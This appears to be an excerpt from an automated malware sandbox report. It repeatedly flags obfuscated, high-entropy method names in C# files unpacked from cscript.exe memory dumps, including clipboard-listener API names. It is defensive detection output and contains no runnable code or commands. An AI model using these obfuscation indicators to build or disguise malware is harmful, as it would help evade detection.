                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, ZdLTnuqgOY3k2FQWh.csHigh entropy of concatenated method names: 'QN1t9tXhLhv98EXG7', 'X2y7W9fadgS4DyzNa', 'rK1gTQvr57y1qvnmT', 'LkJsXVRufF1n3PJ76lQAfBskMFNm6LJadKJ1zMIMvqtXkmfgN8GGhgkV2wx7ufqcWRR', 'DWRBoOvnp5ZOvNWvTay4uj94xbk1oDZRBZG7727S2NIL2AEJHJpuwYnGdjWyKfm4Cxo', '_6Cr4EeyxsmAuQpTyEMOMMmtzk4y7c5Pdv3TCzx6AO6yb91EutxpUtaRJZvGthQYiefE', '_7KlSkePwTyZRIZ7PaYrBOI5CMKlMVkfem7GTv8dDwKW8ctC2cMd5sjZqKPSzjKdXfDV', '_1DsqMjnSaA94ZFTw5SBCfVNeAlQrz4KUbcMgXjprzn3KoxHvZ8zEt5bx2O6ofYajP1o', 'IMEai2g1ONuNsx6nnS9sh9H21ljAQJd4wYOCM8Q6sSRL8pMMhrrgGgiSqVyGxJ8qYDn', 'ECraczxHUSC3tua1ouB2OJXo70Rs4XTHxKCKkLtFMOzYb9EH7gPa1PxtSVCNIlWP1Mk'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, 8Jaf9UAvzEGq55typT6Pkhartwa1iUVp.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'gRmA0Fs4Fj8m2cxWH', 'Ql4cwKZRPDBaZnipS', 'O8f8MK31AfQEJkAv2', 'APdUl99vAUyyXAAFu'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, GVhN53QgxWl6tpiCd.csHigh entropy of concatenated method names: 'RegexResult', 'WndProc', 'A6Uhc606QwQ0Zm0HK4Ozk9B8xlClcf2XfewKRB3wrkM5rVhhGkQQQm7gBYl5BTS8oYUncI29SP8SGjvRLM', 'Y5HcfhXIhGhXVEcVey7z4Lc342CyAMYjaPJYZnn3oqkEmcQSrVU4Q3B88ViFqwuWAqZvRSgbsjFYarIH1p'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, hxJwBk8Rp0X6e7PsRDJpGmVPrHx4gBMq.csHigh entropy of concatenated method names: 'M6Pjt09GsWfanRtalnXtJmRxwU16H1g4', 'e6uulpEWxKtDSm0IjZ09pto4x9dIvT0w', '_7WTE8oFH4vwm4x5y202KWqe0ysgpdDu7', 'kbHWNnZ0VwNXYUtCFgAPENDrHTYQAuNH', 'XDg1kNFyH7AXOgoWsq5365MC30QxDnDx', '_4sSTo4uCL8fSjnwfgDoAfdpLQjPJRXa3', 'gl8iadDaKZylRyk425kdkxJ1MnngITIL', 'hY5kUOHes2aO7a2xNznbkJOnNioRDoGR', '_87Eqs9hvQSfBcuJpAYwQiGDBch4J6oid', '_6rYeKKqczmMMjWoeIiacm1JPn48cqxyI'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, dVvs1XNmsaLNa04pa.csHigh entropy of concatenated method names: '_2paFzAijsDRdnCKoS', 'kQDJ059RzJMZ4crRs', 'LMYT5QeAxwNEAEQyD', 'vuoG9Qw4yj5Ea7Rtk', 'RKcu55oqataXXogwd', 'uk0lLV07kANck3Amt', 'mpku9WcyRNohRTvls', 'PKbSuPgiRvoxMmlXu', 'nKRMHesIk5vtTkuKR', 'MpQfw3OoR7IsyK9UY'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, UAKhR7NJbD3KWn0Nd.csHigh entropy of concatenated method names: 'iuxc2Jn7e7nsqLksF', 'OpNm66LKdpnHllqo9', 'Ml9nM3AyoYUue0XRF', 'D0EtLe0PN51VuAfio', 'm3QloB4lgsW9zeGK0', 'pjueMtEmIpYwcD5V1', 'fALBbecRaEfyZw3tB', '_79CkwlVc3CtOCWoBe', 'tb0sOrxbVf181Ira8', 'HD37clOuJb4gwNcKh'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, ktUwZuVPUn1uLnrpF.csHigh entropy of concatenated method names: 'r5ehq0TQjJBz68rR8', 'QnSBBigt3JbpBIcqY9y2vHZ6sgLzWr9ojuMViGfVWBcyUGpOXlmsPmCjP8fIOAcxFgoQL0YdxnI9yqghks', 'VSFnEbXioI2mKeCHHSkNIy3YfOVmwaPF3V6OuntSu885YZTE2FgKeEYvWoFahotlJnFKSYqFQMhOaTie15', 'k7zNPAHAbolvUoiRjwosNMML6wZoj5vTpZzf6XasIQc969qsYKTDsFIcFvZJGr9LAYX8Ac0F8F62sv52lg', 'HmDpdgze425todh9IXctabQNoP8p4QdKuMVRAB6Zx1XSRQHespvrBzGkgSb4QJluB1ZaU0aXYos3zJYnbc'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, bRv5O3fSB18gLSRt9.csHigh entropy of concatenated method names: 'smksmczVmWBEJfyBP', 'j2w2bSDFvXcjvXugO', '_1wu2TMKAHwLqmgw4rRoINBl0v0Q11LgQIgrshFE8r0jb83sWx2eTS7X0jck48xfJkMkEkRYwFq4ktLkgxR', 'CFCGhrg4ddiKj09LfGQA0WlxfpeTCAaHUSc7ewPfgamIcgkJmHKs6SqcKRC56H25kqi79TPEPYEySRA1L5', 'Qmb01m7kmJdvWvm0K4Y08f8oBwndyX4oIfNRQrX2NgY0phtlCtL7JUqncsw8JnFClRyaIsXmzDKCudztky', 'vYaYQeVg5xsFbsakW741PvOrJOf3sn19cSBhDWDFtCLm9yinHZ3LZBoqTnDER5qpySRWanWjM7WpB6HOYR'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csHigh entropy of concatenated method names: 'q7pAZzZ3EnDiRJA6CNudmPgpuGbGtzpV', 'CkT357DsXaHLKIXTIhRm4kN0H24oG2FD', 'nJzVTyPvta5afVyiFSidm4GqBFgW7f9g', 'tLIlAAnoafWpdOaoRWhdFg6l4dseJWWx', 'YET2lYIFTsgJpoPEOdBScEDdRgzldShF', 'L6BGSE4pwNi71UDsMK6klIUnSmANhFmw', 'cvzy5SNuRaLgmVERLhgSyzDYVr4LVZd4', 'tVVnHrcxEBkzo1zE6jhNwNnotPTZSzXj', '_8xyl6DFq166NLZUgwWo4mmWQkKl4d9DF', 'rwQZIKpAzdG74MTjcPhc0ME4fzTwgZSX'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, GXHRyrck0HnRoIRVg.csHigh entropy of concatenated method names: 'H3d6de69oR3hKhOMF', 'PhLmFVcQl3QkZyLzU', '_0TAO5Rsvxq9hzGOHj', 'hkoXtS7v1o1Lef3Gg', 'EesGi649DqUXimQnP8LOo13R6JvL2okzjhNemMjvknVdKmJ2GcbBTlVqL129fAMVsxSZRKQbkkgiZk1Kba', 'khPGLbg46ec6YHwaaD1ctwXsCnUDeYzHybkSaqJCcabz9Mvlo11Jw6fZjjMsRZdEfi2GoTDZyJhdr5AwmW', 'ONZCRP2BVNthbERN5mHt6qCJ9YuDq1lz5xR0EOVlZhx2ReKqNzcj2aOk7BR5WtrHttLMYgtp7pPe2RQhMm', '_2MIhGHTjOP3HS1WYi2JRTfTBCKHGj6LKeSylOF679UubLjKh8R6oNH9ZTWu6k4z1NzysQKAxTxDti4bUbm', 'GiCVAfCZlR4DR4eU8Z6NOt9xE25VDaoeytXt9JC1RhbBkKqgeFmcpqJsOkxRAfU6LzqzvwVvR8SmQrJJZl', '_06FgkZyQ6qKa6EBqZ0SRn2aSy9aaZNXsUVIep2s0y0TwrkNqpIv8gjSA6XOeMCsktxOujuNwFm1fOhU4ru'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, 8oKYND99avZqdoU5T.csHigh entropy of concatenated method names: 'KyPhJhKVrFVArWuxw', 'PQ8qqiFBLASb2FLzqrnN46HS69ygJNaOOQlMwXpIWU2SKE5rznDYbOUhiCsPYdMPC0MECV1YQi1qGk5Iup', '_9gAulm5e8maJgutrMhxwthm4lzCqQpF0KCitRHiYwH831dNo1uUC5G39BcsxHM2BsMs4eNNpcCyRY7qHNj', 'zGPfrZccwieTHXHnSP0iLyDL6jwyBkyMFrIgTTfDcciXXAAIfIbGYsZz2X94sSUBvmDf3sdHuKBYAFDK4G', 'EitRvQvAGcep1Bt7DjDI0KwSBiB6169EbtD2qI1CZRsWl63XNC2qUBExz0H0ivtM2gNfRY1lfOS4nRdBiV'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, y9w99ZmeIXuttmqO5.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', '_3kuUQ6D859FcECMAW', 'QgYdRiaf38MhnznUlpxjDWzd0koDOaVwqOdFYGDNGzFn6bjwp3UpijxM4zpWvMK4SY4cXjhrkdVAe2nPyt', '_3eiiVv8u9xN1WSgJWAhnNWNQMnJOxABF1zg3Jg6XnQge2tfZsyyIn3fFtIv5SLvPsTUO9uTJdpRUGhoY9F', 'qWiINr7fQVvakV8gHNZYqLqeFMYaLXEJxSTrr5Q9K8IdwsVVeqg0HRQEAxelT7DsaglEB18iPwEYo80mIK', 'k0sfNA0h1lQs4gZEiXmJUJXzf7KegJ64WqDZSlWizXHsLr3tBUg8xN3RhdyryYJu9ejcFXQo1RrQGE0Aoi'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, ZdLTnuqgOY3k2FQWh.csHigh entropy of concatenated method names: 'QN1t9tXhLhv98EXG7', 'X2y7W9fadgS4DyzNa', 'rK1gTQvr57y1qvnmT', 'LkJsXVRufF1n3PJ76lQAfBskMFNm6LJadKJ1zMIMvqtXkmfgN8GGhgkV2wx7ufqcWRR', 'DWRBoOvnp5ZOvNWvTay4uj94xbk1oDZRBZG7727S2NIL2AEJHJpuwYnGdjWyKfm4Cxo', '_6Cr4EeyxsmAuQpTyEMOMMmtzk4y7c5Pdv3TCzx6AO6yb91EutxpUtaRJZvGthQYiefE', '_7KlSkePwTyZRIZ7PaYrBOI5CMKlMVkfem7GTv8dDwKW8ctC2cMd5sjZqKPSzjKdXfDV', '_1DsqMjnSaA94ZFTw5SBCfVNeAlQrz4KUbcMgXjprzn3KoxHvZ8zEt5bx2O6ofYajP1o', 'IMEai2g1ONuNsx6nnS9sh9H21ljAQJd4wYOCM8Q6sSRL8pMMhrrgGgiSqVyGxJ8qYDn', 'ECraczxHUSC3tua1ouB2OJXo70Rs4XTHxKCKkLtFMOzYb9EH7gPa1PxtSVCNIlWP1Mk'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, 8Jaf9UAvzEGq55typT6Pkhartwa1iUVp.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'gRmA0Fs4Fj8m2cxWH', 'Ql4cwKZRPDBaZnipS', 'O8f8MK31AfQEJkAv2', 'APdUl99vAUyyXAAFu'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, GVhN53QgxWl6tpiCd.csHigh entropy of concatenated method names: 'RegexResult', 'WndProc', 'A6Uhc606QwQ0Zm0HK4Ozk9B8xlClcf2XfewKRB3wrkM5rVhhGkQQQm7gBYl5BTS8oYUncI29SP8SGjvRLM', 'Y5HcfhXIhGhXVEcVey7z4Lc342CyAMYjaPJYZnn3oqkEmcQSrVU4Q3B88ViFqwuWAqZvRSgbsjFYarIH1p'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, hxJwBk8Rp0X6e7PsRDJpGmVPrHx4gBMq.csHigh entropy of concatenated method names: 'M6Pjt09GsWfanRtalnXtJmRxwU16H1g4', 'e6uulpEWxKtDSm0IjZ09pto4x9dIvT0w', '_7WTE8oFH4vwm4x5y202KWqe0ysgpdDu7', 'kbHWNnZ0VwNXYUtCFgAPENDrHTYQAuNH', 'XDg1kNFyH7AXOgoWsq5365MC30QxDnDx', '_4sSTo4uCL8fSjnwfgDoAfdpLQjPJRXa3', 'gl8iadDaKZylRyk425kdkxJ1MnngITIL', 'hY5kUOHes2aO7a2xNznbkJOnNioRDoGR', '_87Eqs9hvQSfBcuJpAYwQiGDBch4J6oid', '_6rYeKKqczmMMjWoeIiacm1JPn48cqxyI'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, dVvs1XNmsaLNa04pa.csHigh entropy of concatenated method names: '_2paFzAijsDRdnCKoS', 'kQDJ059RzJMZ4crRs', 'LMYT5QeAxwNEAEQyD', 'vuoG9Qw4yj5Ea7Rtk', 'RKcu55oqataXXogwd', 'uk0lLV07kANck3Amt', 'mpku9WcyRNohRTvls', 'PKbSuPgiRvoxMmlXu', 'nKRMHesIk5vtTkuKR', 'MpQfw3OoR7IsyK9UY'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, UAKhR7NJbD3KWn0Nd.csHigh entropy of concatenated method names: 'iuxc2Jn7e7nsqLksF', 'OpNm66LKdpnHllqo9', 'Ml9nM3AyoYUue0XRF', 'D0EtLe0PN51VuAfio', 'm3QloB4lgsW9zeGK0', 'pjueMtEmIpYwcD5V1', 'fALBbecRaEfyZw3tB', '_79CkwlVc3CtOCWoBe', 'tb0sOrxbVf181Ira8', 'HD37clOuJb4gwNcKh'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, ktUwZuVPUn1uLnrpF.csHigh entropy of concatenated method names: 'r5ehq0TQjJBz68rR8', 'QnSBBigt3JbpBIcqY9y2vHZ6sgLzWr9ojuMViGfVWBcyUGpOXlmsPmCjP8fIOAcxFgoQL0YdxnI9yqghks', 'VSFnEbXioI2mKeCHHSkNIy3YfOVmwaPF3V6OuntSu885YZTE2FgKeEYvWoFahotlJnFKSYqFQMhOaTie15', 'k7zNPAHAbolvUoiRjwosNMML6wZoj5vTpZzf6XasIQc969qsYKTDsFIcFvZJGr9LAYX8Ac0F8F62sv52lg', 'HmDpdgze425todh9IXctabQNoP8p4QdKuMVRAB6Zx1XSRQHespvrBzGkgSb4QJluB1ZaU0aXYos3zJYnbc'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, bRv5O3fSB18gLSRt9.csHigh entropy of concatenated method names: 'smksmczVmWBEJfyBP', 'j2w2bSDFvXcjvXugO', '_1wu2TMKAHwLqmgw4rRoINBl0v0Q11LgQIgrshFE8r0jb83sWx2eTS7X0jck48xfJkMkEkRYwFq4ktLkgxR', 'CFCGhrg4ddiKj09LfGQA0WlxfpeTCAaHUSc7ewPfgamIcgkJmHKs6SqcKRC56H25kqi79TPEPYEySRA1L5', 'Qmb01m7kmJdvWvm0K4Y08f8oBwndyX4oIfNRQrX2NgY0phtlCtL7JUqncsw8JnFClRyaIsXmzDKCudztky', 'vYaYQeVg5xsFbsakW741PvOrJOf3sn19cSBhDWDFtCLm9yinHZ3LZBoqTnDER5qpySRWanWjM7WpB6HOYR'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csHigh entropy of concatenated method names: 'q7pAZzZ3EnDiRJA6CNudmPgpuGbGtzpV', 'CkT357DsXaHLKIXTIhRm4kN0H24oG2FD', 'nJzVTyPvta5afVyiFSidm4GqBFgW7f9g', 'tLIlAAnoafWpdOaoRWhdFg6l4dseJWWx', 'YET2lYIFTsgJpoPEOdBScEDdRgzldShF', 'L6BGSE4pwNi71UDsMK6klIUnSmANhFmw', 'cvzy5SNuRaLgmVERLhgSyzDYVr4LVZd4', 'tVVnHrcxEBkzo1zE6jhNwNnotPTZSzXj', '_8xyl6DFq166NLZUgwWo4mmWQkKl4d9DF', 'rwQZIKpAzdG74MTjcPhc0ME4fzTwgZSX'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, GXHRyrck0HnRoIRVg.csHigh entropy of concatenated method names: 'H3d6de69oR3hKhOMF', 'PhLmFVcQl3QkZyLzU', '_0TAO5Rsvxq9hzGOHj', 'hkoXtS7v1o1Lef3Gg', 'EesGi649DqUXimQnP8LOo13R6JvL2okzjhNemMjvknVdKmJ2GcbBTlVqL129fAMVsxSZRKQbkkgiZk1Kba', 'khPGLbg46ec6YHwaaD1ctwXsCnUDeYzHybkSaqJCcabz9Mvlo11Jw6fZjjMsRZdEfi2GoTDZyJhdr5AwmW', 'ONZCRP2BVNthbERN5mHt6qCJ9YuDq1lz5xR0EOVlZhx2ReKqNzcj2aOk7BR5WtrHttLMYgtp7pPe2RQhMm', '_2MIhGHTjOP3HS1WYi2JRTfTBCKHGj6LKeSylOF679UubLjKh8R6oNH9ZTWu6k4z1NzysQKAxTxDti4bUbm', 'GiCVAfCZlR4DR4eU8Z6NOt9xE25VDaoeytXt9JC1RhbBkKqgeFmcpqJsOkxRAfU6LzqzvwVvR8SmQrJJZl', '_06FgkZyQ6qKa6EBqZ0SRn2aSy9aaZNXsUVIep2s0y0TwrkNqpIv8gjSA6XOeMCsktxOujuNwFm1fOhU4ru'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, 8oKYND99avZqdoU5T.csHigh entropy of concatenated method names: 'KyPhJhKVrFVArWuxw', 'PQ8qqiFBLASb2FLzqrnN46HS69ygJNaOOQlMwXpIWU2SKE5rznDYbOUhiCsPYdMPC0MECV1YQi1qGk5Iup', '_9gAulm5e8maJgutrMhxwthm4lzCqQpF0KCitRHiYwH831dNo1uUC5G39BcsxHM2BsMs4eNNpcCyRY7qHNj', 'zGPfrZccwieTHXHnSP0iLyDL6jwyBkyMFrIgTTfDcciXXAAIfIbGYsZz2X94sSUBvmDf3sdHuKBYAFDK4G', 'EitRvQvAGcep1Bt7DjDI0KwSBiB6169EbtD2qI1CZRsWl63XNC2qUBExz0H0ivtM2gNfRY1lfOS4nRdBiV'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, y9w99ZmeIXuttmqO5.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', '_3kuUQ6D859FcECMAW', 'QgYdRiaf38MhnznUlpxjDWzd0koDOaVwqOdFYGDNGzFn6bjwp3UpijxM4zpWvMK4SY4cXjhrkdVAe2nPyt', '_3eiiVv8u9xN1WSgJWAhnNWNQMnJOxABF1zg3Jg6XnQge2tfZsyyIn3fFtIv5SLvPsTUO9uTJdpRUGhoY9F', 'qWiINr7fQVvakV8gHNZYqLqeFMYaLXEJxSTrr5Q9K8IdwsVVeqg0HRQEAxelT7DsaglEB18iPwEYo80mIK', 'k0sfNA0h1lQs4gZEiXmJUJXzf7KegJ64WqDZSlWizXHsLr3tBUg8xN3RhdyryYJu9ejcFXQo1RrQGE0Aoi'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, ZdLTnuqgOY3k2FQWh.csHigh entropy of concatenated method names: 'QN1t9tXhLhv98EXG7', 'X2y7W9fadgS4DyzNa', 'rK1gTQvr57y1qvnmT', 'LkJsXVRufF1n3PJ76lQAfBskMFNm6LJadKJ1zMIMvqtXkmfgN8GGhgkV2wx7ufqcWRR', 'DWRBoOvnp5ZOvNWvTay4uj94xbk1oDZRBZG7727S2NIL2AEJHJpuwYnGdjWyKfm4Cxo', '_6Cr4EeyxsmAuQpTyEMOMMmtzk4y7c5Pdv3TCzx6AO6yb91EutxpUtaRJZvGthQYiefE', '_7KlSkePwTyZRIZ7PaYrBOI5CMKlMVkfem7GTv8dDwKW8ctC2cMd5sjZqKPSzjKdXfDV', '_1DsqMjnSaA94ZFTw5SBCfVNeAlQrz4KUbcMgXjprzn3KoxHvZ8zEt5bx2O6ofYajP1o', 'IMEai2g1ONuNsx6nnS9sh9H21ljAQJd4wYOCM8Q6sSRL8pMMhrrgGgiSqVyGxJ8qYDn', 'ECraczxHUSC3tua1ouB2OJXo70Rs4XTHxKCKkLtFMOzYb9EH7gPa1PxtSVCNIlWP1Mk'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, 8Jaf9UAvzEGq55typT6Pkhartwa1iUVp.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'gRmA0Fs4Fj8m2cxWH', 'Ql4cwKZRPDBaZnipS', 'O8f8MK31AfQEJkAv2', 'APdUl99vAUyyXAAFu'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, GVhN53QgxWl6tpiCd.csHigh entropy of concatenated method names: 'RegexResult', 'WndProc', 'A6Uhc606QwQ0Zm0HK4Ozk9B8xlClcf2XfewKRB3wrkM5rVhhGkQQQm7gBYl5BTS8oYUncI29SP8SGjvRLM', 'Y5HcfhXIhGhXVEcVey7z4Lc342CyAMYjaPJYZnn3oqkEmcQSrVU4Q3B88ViFqwuWAqZvRSgbsjFYarIH1p'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, hxJwBk8Rp0X6e7PsRDJpGmVPrHx4gBMq.csHigh entropy of concatenated method names: 'M6Pjt09GsWfanRtalnXtJmRxwU16H1g4', 'e6uulpEWxKtDSm0IjZ09pto4x9dIvT0w', '_7WTE8oFH4vwm4x5y202KWqe0ysgpdDu7', 'kbHWNnZ0VwNXYUtCFgAPENDrHTYQAuNH', 'XDg1kNFyH7AXOgoWsq5365MC30QxDnDx', '_4sSTo4uCL8fSjnwfgDoAfdpLQjPJRXa3', 'gl8iadDaKZylRyk425kdkxJ1MnngITIL', 'hY5kUOHes2aO7a2xNznbkJOnNioRDoGR', '_87Eqs9hvQSfBcuJpAYwQiGDBch4J6oid', '_6rYeKKqczmMMjWoeIiacm1JPn48cqxyI'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, dVvs1XNmsaLNa04pa.csHigh entropy of concatenated method names: '_2paFzAijsDRdnCKoS', 'kQDJ059RzJMZ4crRs', 'LMYT5QeAxwNEAEQyD', 'vuoG9Qw4yj5Ea7Rtk', 'RKcu55oqataXXogwd', 'uk0lLV07kANck3Amt', 'mpku9WcyRNohRTvls', 'PKbSuPgiRvoxMmlXu', 'nKRMHesIk5vtTkuKR', 'MpQfw3OoR7IsyK9UY'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, UAKhR7NJbD3KWn0Nd.csHigh entropy of concatenated method names: 'iuxc2Jn7e7nsqLksF', 'OpNm66LKdpnHllqo9', 'Ml9nM3AyoYUue0XRF', 'D0EtLe0PN51VuAfio', 'm3QloB4lgsW9zeGK0', 'pjueMtEmIpYwcD5V1', 'fALBbecRaEfyZw3tB', '_79CkwlVc3CtOCWoBe', 'tb0sOrxbVf181Ira8', 'HD37clOuJb4gwNcKh'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, ktUwZuVPUn1uLnrpF.cs - High entropy of concatenated method names: 'r5ehq0TQjJBz68rR8', 'QnSBBigt3JbpBIcqY9y2vHZ6sgLzWr9ojuMViGfVWBcyUGpOXlmsPmCjP8fIOAcxFgoQL0YdxnI9yqghks', 'VSFnEbXioI2mKeCHHSkNIy3YfOVmwaPF3V6OuntSu885YZTE2FgKeEYvWoFahotlJnFKSYqFQMhOaTie15', 'k7zNPAHAbolvUoiRjwosNMML6wZoj5vTpZzf6XasIQc969qsYKTDsFIcFvZJGr9LAYX8Ac0F8F62sv52lg', 'HmDpdgze425todh9IXctabQNoP8p4QdKuMVRAB6Zx1XSRQHespvrBzGkgSb4QJluB1ZaU0aXYos3zJYnbc'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, bRv5O3fSB18gLSRt9.cs - High entropy of concatenated method names: 'smksmczVmWBEJfyBP', 'j2w2bSDFvXcjvXugO', '_1wu2TMKAHwLqmgw4rRoINBl0v0Q11LgQIgrshFE8r0jb83sWx2eTS7X0jck48xfJkMkEkRYwFq4ktLkgxR', 'CFCGhrg4ddiKj09LfGQA0WlxfpeTCAaHUSc7ewPfgamIcgkJmHKs6SqcKRC56H25kqi79TPEPYEySRA1L5', 'Qmb01m7kmJdvWvm0K4Y08f8oBwndyX4oIfNRQrX2NgY0phtlCtL7JUqncsw8JnFClRyaIsXmzDKCudztky', 'vYaYQeVg5xsFbsakW741PvOrJOf3sn19cSBhDWDFtCLm9yinHZ3LZBoqTnDER5qpySRWanWjM7WpB6HOYR'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.cs - High entropy of concatenated method names: 'q7pAZzZ3EnDiRJA6CNudmPgpuGbGtzpV', 'CkT357DsXaHLKIXTIhRm4kN0H24oG2FD', 'nJzVTyPvta5afVyiFSidm4GqBFgW7f9g', 'tLIlAAnoafWpdOaoRWhdFg6l4dseJWWx', 'YET2lYIFTsgJpoPEOdBScEDdRgzldShF', 'L6BGSE4pwNi71UDsMK6klIUnSmANhFmw', 'cvzy5SNuRaLgmVERLhgSyzDYVr4LVZd4', 'tVVnHrcxEBkzo1zE6jhNwNnotPTZSzXj', '_8xyl6DFq166NLZUgwWo4mmWQkKl4d9DF', 'rwQZIKpAzdG74MTjcPhc0ME4fzTwgZSX'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, GXHRyrck0HnRoIRVg.cs - High entropy of concatenated method names: 'H3d6de69oR3hKhOMF', 'PhLmFVcQl3QkZyLzU', '_0TAO5Rsvxq9hzGOHj', 'hkoXtS7v1o1Lef3Gg', 'EesGi649DqUXimQnP8LOo13R6JvL2okzjhNemMjvknVdKmJ2GcbBTlVqL129fAMVsxSZRKQbkkgiZk1Kba', 'khPGLbg46ec6YHwaaD1ctwXsCnUDeYzHybkSaqJCcabz9Mvlo11Jw6fZjjMsRZdEfi2GoTDZyJhdr5AwmW', 'ONZCRP2BVNthbERN5mHt6qCJ9YuDq1lz5xR0EOVlZhx2ReKqNzcj2aOk7BR5WtrHttLMYgtp7pPe2RQhMm', '_2MIhGHTjOP3HS1WYi2JRTfTBCKHGj6LKeSylOF679UubLjKh8R6oNH9ZTWu6k4z1NzysQKAxTxDti4bUbm', 'GiCVAfCZlR4DR4eU8Z6NOt9xE25VDaoeytXt9JC1RhbBkKqgeFmcpqJsOkxRAfU6LzqzvwVvR8SmQrJJZl', '_06FgkZyQ6qKa6EBqZ0SRn2aSy9aaZNXsUVIep2s0y0TwrkNqpIv8gjSA6XOeMCsktxOujuNwFm1fOhU4ru'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, 8oKYND99avZqdoU5T.cs - High entropy of concatenated method names: 'KyPhJhKVrFVArWuxw', 'PQ8qqiFBLASb2FLzqrnN46HS69ygJNaOOQlMwXpIWU2SKE5rznDYbOUhiCsPYdMPC0MECV1YQi1qGk5Iup', '_9gAulm5e8maJgutrMhxwthm4lzCqQpF0KCitRHiYwH831dNo1uUC5G39BcsxHM2BsMs4eNNpcCyRY7qHNj', 'zGPfrZccwieTHXHnSP0iLyDL6jwyBkyMFrIgTTfDcciXXAAIfIbGYsZz2X94sSUBvmDf3sdHuKBYAFDK4G', 'EitRvQvAGcep1Bt7DjDI0KwSBiB6169EbtD2qI1CZRsWl63XNC2qUBExz0H0ivtM2gNfRY1lfOS4nRdBiV'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, y9w99ZmeIXuttmqO5.cs - High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', '_3kuUQ6D859FcECMAW', 'QgYdRiaf38MhnznUlpxjDWzd0koDOaVwqOdFYGDNGzFn6bjwp3UpijxM4zpWvMK4SY4cXjhrkdVAe2nPyt', '_3eiiVv8u9xN1WSgJWAhnNWNQMnJOxABF1zg3Jg6XnQge2tfZsyyIn3fFtIv5SLvPsTUO9uTJdpRUGhoY9F', 'qWiINr7fQVvakV8gHNZYqLqeFMYaLXEJxSTrr5Q9K8IdwsVVeqg0HRQEAxelT7DsaglEB18iPwEYo80mIK', 'k0sfNA0h1lQs4gZEiXmJUJXzf7KegJ64WqDZSlWizXHsLr3tBUg8xN3RhdyryYJu9ejcFXQo1RrQGE0Aoi'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, ZdLTnuqgOY3k2FQWh.cs - High entropy of concatenated method names: 'QN1t9tXhLhv98EXG7', 'X2y7W9fadgS4DyzNa', 'rK1gTQvr57y1qvnmT', 'LkJsXVRufF1n3PJ76lQAfBskMFNm6LJadKJ1zMIMvqtXkmfgN8GGhgkV2wx7ufqcWRR', 'DWRBoOvnp5ZOvNWvTay4uj94xbk1oDZRBZG7727S2NIL2AEJHJpuwYnGdjWyKfm4Cxo', '_6Cr4EeyxsmAuQpTyEMOMMmtzk4y7c5Pdv3TCzx6AO6yb91EutxpUtaRJZvGthQYiefE', '_7KlSkePwTyZRIZ7PaYrBOI5CMKlMVkfem7GTv8dDwKW8ctC2cMd5sjZqKPSzjKdXfDV', '_1DsqMjnSaA94ZFTw5SBCfVNeAlQrz4KUbcMgXjprzn3KoxHvZ8zEt5bx2O6ofYajP1o', 'IMEai2g1ONuNsx6nnS9sh9H21ljAQJd4wYOCM8Q6sSRL8pMMhrrgGgiSqVyGxJ8qYDn', 'ECraczxHUSC3tua1ouB2OJXo70Rs4XTHxKCKkLtFMOzYb9EH7gPa1PxtSVCNIlWP1Mk'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, 8Jaf9UAvzEGq55typT6Pkhartwa1iUVp.cs - High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'gRmA0Fs4Fj8m2cxWH', 'Ql4cwKZRPDBaZnipS', 'O8f8MK31AfQEJkAv2', 'APdUl99vAUyyXAAFu'
